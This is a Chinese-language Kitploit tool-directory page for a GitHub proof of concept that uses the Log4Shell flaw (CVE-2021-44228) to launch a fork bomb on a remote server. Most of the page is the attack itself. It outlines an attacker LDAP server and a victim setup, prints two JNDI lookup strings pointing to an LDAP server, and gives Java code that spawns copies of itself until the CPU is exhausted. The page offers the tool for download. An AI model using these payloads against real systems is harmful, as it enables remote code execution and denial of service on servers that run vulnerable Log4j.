Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 概念验证:利用CVE-2021-44228漏洞在远程服务器上启动fork炸弹的示例 | Kitploit
工具/GitHubGitHub/funcid/log4j-exploit-fork-bomb
漏洞分析漏洞利用Web应用程序漏洞利用命令与控制Payload 开发
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 概念验证:利用CVE-2021-44228漏洞在远程服务器上启动fork炸弹的示例

查看仓库
3年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

log4j-exploit-with-fork-bomb

💣💥💀 Proof of Concept: 利用 CVE-2021-44228 漏洞在远程服务器上启动 fork bomb 的示例

  1. 创建攻击者的 LDAP 服务器(server 模块),该服务器将提供字符串和代码的表示(payload 模块)

  2. 创建受害者示例(victim 模块),并将字符串传递给 Log4j JRE 版本 <= 6u211, 7u201, 8u191 和 11.0.1

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. 受害者应用程序将从攻击者服务器接收字节数组,并将其解释为代入字符串或可执行代码(参数 com.sun.jndi.ldap.object.trustURLCodebase = true)

  2. 例如,可执行代码将是 fork bomb(一种程序,它会启动自身的副本,耗尽所有 CPU 时间)

root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
下载工具